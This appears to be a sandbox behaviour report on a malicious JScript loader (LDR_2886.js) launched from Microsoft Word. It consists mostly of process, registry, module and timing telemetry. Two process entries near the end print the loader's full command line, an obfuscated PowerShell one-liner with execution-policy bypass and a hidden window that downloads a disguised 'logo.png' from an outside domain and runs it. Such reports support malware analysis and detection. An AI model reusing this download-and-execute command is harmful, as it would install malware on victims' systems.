Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 5593696 True 1
Fn
System (78)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:50 (UTC) True 1
Fn
Get Time type = Ticks, time = 178527 True 1
Fn
Get Time type = Performance Ctr, time = 23299783442 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 180368 True 1
Fn
Get Time type = Performance Ctr, time = 23484739601 True 1
Fn
Get Time type = Ticks, time = 180383 True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:53 (UTC) True 2
Fn
Get Time type = Ticks, time = 180898 True 2
Fn
Get Time type = Performance Ctr, time = 23536533608 True 1
Fn
Get Time type = Performance Ctr, time = 23537400291 True 1
Fn
Get Time type = Ticks, time = 183550 True 1
Fn
Get Time type = Ticks, time = 184346 True 2
Fn
Get Time type = Ticks, time = 184377 True 3
Fn
Get Time type = Ticks, time = 184549 True 1
Fn
Get Time type = Ticks, time = 184564 True 3
Fn
Get Time type = Ticks, time = 184580 True 3
Fn
Get Time type = Ticks, time = 184720 True 1
Fn
Get Time type = Ticks, time = 184736 True 2
Fn
Get Time type = Ticks, time = 184751 True 1
Fn
Get Time type = Ticks, time = 184907 True 1
Fn
Get Time type = Ticks, time = 184923 True 1
Fn
Get Time type = Ticks, time = 184939 True 3
Fn
Get Time type = Ticks, time = 185157 True 1
Fn
Get Time type = Ticks, time = 185173 True 2
Fn
Get Time type = Ticks, time = 185188 True 1
Fn
Get Time type = Ticks, time = 185422 True 1
Fn
Get Time type = Ticks, time = 185453 True 3
Fn
Get Time type = Ticks, time = 185687 True 1
Fn
Get Time type = Ticks, time = 186031 True 3
Fn
Get Time type = Ticks, time = 186046 True 5
Fn
Get Time type = Ticks, time = 186062 True 4
Fn
Get Time type = Ticks, time = 186249 True 1
Fn
Get Time type = Ticks, time = 186265 True 3
Fn
Get Time type = System Time, time = 2019-07-26 16:46:58 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 24074309190 True 1
Fn
Get Time type = Ticks, time = 187731 True 1
Fn
Get Time type = Ticks, time = 187747 True 2
Fn
Get Info type = Operating System True 6
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = <ò True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #35: wscript.exe
162 0
»
Information Value
ID #35
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:53, Reason: Child Process
Unmonitor End Time: 00:02:01, Reason: Self Terminated
Monitor Duration 00:00:07
OS Process Information
»
Information Value
PID 0x978
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 8EC
0x 110
0x 764
0x BE4
0x 858
0x 364
0x 884
0x B84
0x ACC
0x ACC
Host Behavior
COM (4)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 48, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 48, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 48, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 48, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Module (21)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Load ole32.dll base_address = 0x7fefea30000 True 1
Fn
Load C:\Windows\system32\advapi32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xffa90000 True 2
Fn
Get Handle c:\windows\system32\ole32.dll base_address = 0x7fefea30000 True 1
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegQueryValueExA, address_out = 0x7fefd72c480 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegCloseKey, address_out = 0x7fefd730710 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoGetObjectContext, address_out = 0x7fefea4c920 True 1
Fn
Get Address c:\windows\system32\ole32.dll function = CoCreateInstance, address_out = 0x7fefea57490 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferIdentifyLevel, address_out = 0x7fefd72e470 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferComputeTokenFromLevel, address_out = 0x7fefd72f9b0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = SaferCloseLevel, address_out = 0x7fefd72f660 True 1
Fn
Create Mapping C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js filename = C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js, protection = PAGE_READONLY, maximum_size = 19304 True 1
Fn
Map C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js process_name = c:\windows\system32\wscript.exe, desired_access = FILE_MAP_READ True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 3889760 True 1
Fn
System (68)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:46:57 (UTC) True 1
Fn
Get Time type = Ticks, time = 184845 True 1
Fn
Get Time type = Performance Ctr, time = 23931632933 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:46:58 (UTC) True 3
Fn
Get Time type = Ticks, time = 185890 True 1
Fn
Get Time type = Performance Ctr, time = 24036767964 True 1
Fn
Get Time type = Ticks, time = 185906 True 2
Fn
Get Time type = Ticks, time = 186155 True 1
Fn
Get Time type = Performance Ctr, time = 24063586094 True 1
Fn
Get Time type = Ticks, time = 186358 True 1
Fn
Get Time type = Performance Ctr, time = 24082514058 True 1
Fn
Get Time type = Ticks, time = 186904 True 1
Fn
Get Time type = Ticks, time = 186920 True 5
Fn
Get Time type = Ticks, time = 186935 True 12
Fn
Get Time type = Ticks, time = 186998 True 4
Fn
Get Time type = Ticks, time = 187013 True 6
Fn
Get Time type = Ticks, time = 187029 True 5
Fn
Get Time type = Ticks, time = 187045 True 2
Fn
Get Time type = Ticks, time = 187060 True 4
Fn
Get Time type = Ticks, time = 187076 True 1
Fn
Get Time type = Ticks, time = 187091 True 1
Fn
Get Time type = Ticks, time = 187716 True 3
Fn
Get Info type = Operating System True 4
Fn
Get Info type = Operating System True 1
Fn
Get Info type = System Directory, result_out = Lî% True 1
Fn
Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String name = JS_PROFILER False 1
Fn
Process #36: wscript.exe
134 0
»
Information Value
ID #36
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:57, Reason: Child Process
Unmonitor End Time: 00:02:04, Reason: Self Terminated
Monitor Duration 00:00:07
OS Process Information
»
Information Value
PID 0x71c
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 6D8
0x 760
0x 4B8
0x 4F4
0x 6EC
0x C1C
0x C24
0x C28
0x C44
0x C8C
Host Behavior
COM (2)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (2)
»
Operation Filename Additional Information Success Count Logfile
Get Info - type = size True 1
Fn
Read - size = 19304, size_out = 19304 True 1
Fn
Data
Registry (28)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = TrustPolicy, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = UseWINSAFER, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 1, type = REG_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Timeout, data = 208, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = DisplayLogo, data = 49, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\.js data = JSFile, type = REG_SZ True 1
Fn
Read Value HKEY_CLASSES_ROOT\JSFile\ScriptEngine data = JScript, type = REG_SZ True 1
Fn
Module (9)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x77040000 True 1
Fn
Load ADVAPI32.dll base_address = 0x7fefd710000 True 1
Fn
Get Handle c:\windows\system32\wscript.exe base_address = 0xffa90000 True 2
Fn
Get Filename c:\windows\system32\wscript.exe process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 261 True 1
Fn
Get Filename - process_name = c:\windows\system32\wscript.exe, file_name_orig = C:\Windows\System32\WScript.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = HeapSetInformation, address_out = 0x7705c4a0 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x7717f570 True 1
Fn
Get Address c:\windows\system32\advapi32.dll function = RegOpenKeyExA, address_out = 0x7fefd72b5f0 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = WSH-Timer, wndproc_parameter = 154208 True 1
Fn
System (62)
»
Operation Additional Information Success Count Logfile
Sleep duration = -1 (infinite) True 2
Fn
Get Time type = System Time, time = 2019-07-26 16:47:00 (UTC) True 1
Fn
Get Time type = Ticks, time = 187981 True 1
Fn
Get Time type = Performance Ctr, time = 24245430100 True 1
Fn
Get Time type = System Time, time = 2019-07-26 16:47:01 (UTC) True 3
Fn
Get Time type = Ticks, time = 189151 True 1
Fn
Get Time type = Performance Ctr, time = 24369527681 True 1
Fn
Get Time type = Ticks, time = 189463 True 1
Fn
Get Time type = Performance Ctr, time = 24400361280 True 1
Fn
Get Time type = Ticks, time = 189572 True 1
Fn
Get Time type = Performance Ctr, time = 24413439936 True 1
Fn
Get Time type = Ticks, time = 189744 True 3
Fn
Get Time type = Ticks, time = 189759 True 8
Fn
Get Time type = Ticks, time = 190040 True 7
Fn
Get Time type = Ticks, time = 190056 True 8
Fn
Get Time type = Ticks, time = 190071 True 4
Fn
Get Time type = Ticks, time = 190212 True 2
Fn
Get Time type = Ticks, time = 190227 True 4
Fn
Get Time type = Ticks, time = 190243 True 3
Fn
Get Time type = Ticks, time = 190414 True 1
Fn
Get Time type = Ticks, time = 190430 True 1
Fn
Get Time type = Ticks, time = 190446 True 1
Fn
Get Time type = Ticks, time = 190570 True 2
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Hardware Information True 1
Fn
Process #37: cmd.exe
57 0
»
Information Value
ID #37
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:59, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:26
OS Process Information
»
Information Value
PID 0x8c0
Parent PID 0x978 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 728
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xc54, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:47:03 (UTC) True 1
Fn
Get Time type = Ticks, time = 190914 True 1
Fn
Get Time type = Performance Ctr, time = 24547266980 True 1
Fn
Environment (15)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 5
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Set Environment String name = COPYCMD True 1
Fn
Process #38: cmd.exe
57 0
»
Information Value
ID #38
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:01:59, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:26
OS Process Information
»
Information Value
PID 0xb44
Parent PID 0x6a8 (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 7DC
Host Behavior
File (11)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Get Info STD_ERROR_HANDLE type = file_type True 1
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 3
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe os_pid = 0xc64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
